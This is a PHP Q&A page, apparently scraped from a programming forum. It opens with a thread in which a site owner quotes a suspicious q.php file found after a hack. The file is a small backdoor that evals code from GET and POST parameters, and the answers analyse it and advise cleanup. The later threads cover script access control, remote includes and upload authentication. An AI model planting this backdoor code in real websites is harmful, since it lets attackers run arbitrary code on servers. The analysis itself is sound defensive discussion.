hacked website unusual php file - php

I have a file called q.php that has appeared in one of my websites. The site has been hacked. does anyone know what the file does?
<? error_reporting(0); if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(#$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>

It looks like it lets anyone execute php code that is passed in as a 'q' parameter in a get request, or any code in 'eval' param of a POST request. It suppress all associated errors.
This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.

It runs the PHP code sent in the ?q= GET argument or the POST eval argument.
I would advice you to clean up your server and start from a clean installation again.

It will enable the attacker to execute any code.
If you pass code to that script either by ?q=code in the URL or by including it into a POST-Request into the eval parameter it will get executed.
So basically this is a remote code execution backdoor.

Nice. Not sure what the first line is for, but the two eval lines allow someone to execute any code they please on your server by passing it in the url or post data respectively.

The bigger question is how were the attackers able to upload the file in the first place. What that file contains is quite typical of code that is inserted so that attackers are able to execute code on your server without permission.
Merely deleting this file and any other files with rogue code in them is not fixing the problem, which is somehow attackers are able to upload files into your websites file repository.
At any rate, here is a complete breakdown:
1/ error_reporting(0);
Sets the error reporting to off.
2/ if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
When the URL is called with /?wpth on the end, the URL is echo'd at the top of the page.
3/
This will execute any code included in the value of q. i.e. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4/ if (!isset($_POST['eval'])) {die('');}
Kill the page execution if a post form variable called eval is not set.
5/ eval($_POST['eval']);
Execute any code posted from a remoted hosted form where the form variable is called eval

Related

Allow window.location but prevent direct access to a PHP file

I have a script file named script.php which is accessed from another php file called main.php through the "Window.location" command. I want to prevent direct access to file, i.e, no one can type script.php in the URL bar and view the contents of the file. But I want my main.php to be able to redirect to script.php using window.location. Any way to do this?
I have tried using Debug Backtrace and preg_match() but these are also blocking the window.location from main.php. Any way to get around this?
I'm not really sure what and why you want to do. There is no way to only allow a script to open a URL, because the browser will handle it.
Normally you should check in the files itself, if the user is allowed to use them. So you have to find a logic for you, how to tell you script, if the user should see it. Otherwise you can do some other action, like displaying an error or redirect him back to you main.php.
Just some quick ideas ...
Idea 1.) If possible, you can include() the script.php in main.php and block the direct access via .htaccess. Then you don't need a redirect and no one can access it directly.
Idea 2.) Set a session variable in main.php like $_SESSION["allow"] = true; and check this again in script.php. Afterwards set the value to false, so the next call will be fail.
Idea 3.) Add a parameter to the file call, like script.php?allow=true. But in this case, all users who know the parameter could call it.
Idea 4.) Add a custom parameter to the redirect, wich is only valid for a given time. To be simple, something like php time(). Check if the parameter is within a short time limit. But in this case, the redirect url has to be generated when the main.php file starts the redirect. Otherwise the request could be already to old.
So that are my ideas. Hope something gives you a hint how to do it.

Constant set using define() not working in included PHP file

I have this code inside of my header
<?php
define('RELPATH','http://www.saint57records.com/');
include_once(RELPATH.'sidebar.php');
?>
and an example line of code in the sidebar
<img style="margin:10px;" src="<?php print RELPATH;?>images/logo.png" width="60px"/>
but when it gets to the page it includes the file correctly but all the links inside of the file just print RELPATH instead of the web url like this
<img style="margin:10px;" src="RELPATHimages/logo.png" width="60px"/>
It works fine on the other pages of my website, just not inside of Wordpress. Does anyone know what might be causing this issue?
The short answer is to provide a filesystem path to RELPATH, not a web URL.
The long answer is that when you use a web URL to include a PHP file, the PHP file will be treated like an external source. It will be called remotely, executed in a process of its own, and return the results. A constant defined previously can not have an effect in this remote resource.
If http://www.saint57records.com/ is on a different server, you'll have to pass RELPATH to it some other way, e.g. through a GET variable (which you'd have to sanitize with htmlentities() prior to use.) However, including content from a remote server in this way isn't good practice. It'll slow down your page as it'll make an expensive web request. If the target server is down, your page will time out.

Very strange php include behavior..

I am experiencing some very strange behavior when including a php file.
I need to load a script that is not on the same domain as the page that will be calling it.
I have already created a system that works using cURL, but I just recently found out that many of the sites that will need to have access to this script, do not have cURL installed.
I did, however, notice that these sites have allow_url_fopen set to on. With this knowledge I got started creating a new system that would let me just include the script on the remote site.
Just testing this out, I coded the script test.php as follows:
<?php
echo("test");
?>
I include this script on the remote page using:
<?php
include("http://mydomain.com/script.php");
?>
and it works no problem and "test" is printed at the top of the page.
However, if I add a function to the script and try to call the function from the page, it crashes.
To make it worse, this site has php errors turned off and I have no way of turning it on.
To fully make sure that I didn't just mess up the code, I made my test.php look like this:
<?php
function myfunc()
{
return "abc";
}
?>
Then on the page including the file:
<?php
include("http://mydomain.com/script.php");
echo(myfunc());
?>
And it crashes.
Any ideas would be greatly appreciated.
This is not odd behavior, but since you load the file over the internet (note in this case the World Wide Web), the file is interpreted before it is sent to your include function.
Since the script is interpreted no functions will be visible, but only the output of the script.
Either load it over FTP or create an API for the functions.
My guess: The PHP of http://mydomain.com/script.php is interpreted by the web server of mydomain.com. All you're including is the result of that script. For a simple echo("test"), that's "test". Functions do not produce any output and are not made available to the including script. Confirm this by simply visiting http://mydomain.com/script.php in your browser and see what you get. You would need to stop mydomain.com from actually interpreting the PHP file and just returning it as pure text.
But: this sounds like a bad idea to begin with. Cross-domain includes are an anti-patterns. Not only does it open you up to security problems, it also makes every page load unnecessarily slow. If cross-domain inclusions is the answer, your question is wrong.
You are including the client side output from test.php rather than the server-side source code. Rename test.php to test.phpc to prevent executing the script. However this is dangerous out of security point of view.

Cancel an HTTP POST request server side

I am trying to write a script for uploading large files (>500MB). I would like to do some authentication before the upload is processed, eg:
$id = $_GET['key'];
$size = $_GET['size'];
$time = $_GET['time'];
$signature = $_GET['signature'];
$secret = 'asdfgh123456';
if(sha1($id.$size.$time.$secret) != $signature){
echo 'invalid signature';
exit;
}
process upload...
unfortunately php only runs this code after the file has been uploaded to a temp directory, taking up valuable server resources. Is there a way to do this before the upload happens? I have tried similar things with perl/cgi but the same thing happens.
Wow, already 5 answers telling how it can't be done. mod_perl to the rescue, here you can reject a request before the whole request body is uploaded.
Apache is taking care of the upload before the PHP script is even invoked so you won't be able to get at it.
You can either split up the process into two pages (authentication, file upload page) or, if you need to do it all in one page, use an AJAX-esque solution to upload the file after authentication parameters are checked.
As far as I know, you cannot do that in PHP. PHP script is launched in response to a request, but a request is not "sent" until the file is uploaded, since the file being uploaded is a part of the request.
This is definitely not possible inside the PHP script you're uploading to.
The most simple possibility is indeed to provide authentication one step before the upload takes place.
If that is not an option, one slightly outlandish possibility comes to mind - using a RewriteMap and mapping it to an external program (it should be possible to make that program a PHP script).
Using RewriteMap it is possible to rewrite an URL based on the output of a command line program. If you use this directive to call a (separate) PHP script - you won't be able to use the user's session, though! - you would have access to the GET parameters before the request is processed.
If the processing fails (= the credentials are invalid), you could redirect the request to a static resource which would at least prevent PHP from starting up. (I assume the uploaded will be hogging some resources anyway, but probably less than if it were redirected to PHP.)
No guarantees whether this'll work! I have no own experience with RewriteMap.
This is due to the fact that each HTTP request is a single contains all the of form/POST data, including the file upload data.
As such, I don't believe it's possible to handle a file upload request in this fashion irrespective of which scripting language you use.
I don't think you can do this. The best you can do is probably to run an AJAX function onSubmit to do your validation first, then if it returns valid then execute the POST to upload the file. You could set a $_SESSION in your AJAX script if the authentication is valid, then check for that session var in the upload script to allow the upload.

how to prevent PHP's file_get_contents( )

one of my php page returns data like this:
<?php
//...
echo "json string";
?>
but someone else use file_get_contents() to get my data and use in other website.
can anybody tell me what can i do to prevent such thing happen.
i consider if i can get the request's domain name to echo something else.but i dont know
the function to get request's domain name.and if the request is sent by a server,that
will be unhelpful. My English is poor, to express doubts, please bear with.
you can also use sessions. if somewhere in your application, before the user gets the json data, you start a session, then in this page where you are outputting json data, you can check for the session variable. this way only users that have passed the session generator page, can view your output.
suppose you have page A.php that generates the session. use this code before outputting anything in this page.
session_start();
$_SESSION['approvedForJson'] = true;
then in your page where you are outputting json data, before outputting anything, call session_start() again. the beginning of your PHP code is a good place to call it.
then before outputting the json data, check if the session variable for approved users exists, or not.
if ( isset($_SESSION['approvedForJson']) && $_SESSION['approvedForJson'] ) {
echo "json data";
} else {
// bad request
}
You can use $_SERVER['REMOTE_ADDR'] to get the address of the client address. You can also check $_SERVER['HTTP_REFERER'] and block external requests that way, but it's less reliable. There's probably a few other techniques involving $_SERVER that you can try.
Your fighting an uphill battle here. I am assuming your serverside process that responds in json is being consumed via javascript in your users browsers... so there is no easy way to encrypt it. You might try some of the techniques used to prevent xspf (see http://en.wikipedia.org/wiki/Cross-site_request_forgery ). If you developed the client to pass along some session token that is uniq per client you could reduce some of the problem. But, chances are whoever is stealing your data is gonna figure out whatever mechanism you put in place ... assuming this is some sort of ajax type thing. If its a server-server thing then as sli mentions, setting up some restrictions based on the remote ip would help, plus setting up some sort of API authentication tokens would help even more (see oauth for some pointers)
You could also using .htaccess with apache block every external request to the page if it get's called internally or block every request that is not from your domain:
Google search thingie
EDIT
You could also use some php file which includes the file which can not be read. So for example you have file.php:
<?php
$allowedFiles[] = 'somefile.php';
$allowedFiles[] = 'someotherFile.php';
$allowedFiles[] = 'jsonReturnFile.php';
if(in_array($_GET['file'], $allowedFiles)){
include( "include/".$_GET['file'] );
}
?>
Then you can allow file_ get _contents() on that file and write a rewriteRule in your .htacces to disallow any request to the include/ folder.
RewriteRule include* - [F,NC]
That will return a 403 forbidden error for a request to that directory or any file in the directory.
Then you can do you JSON request to something like: file.php?file=jsonReturnFile.php&someothherParamReadByJsonFile=1
And when someone tries to get the file contents for the JSON file they will get the forbidden error, and getting the file contents for the include.php won't return anything usefull.

Categories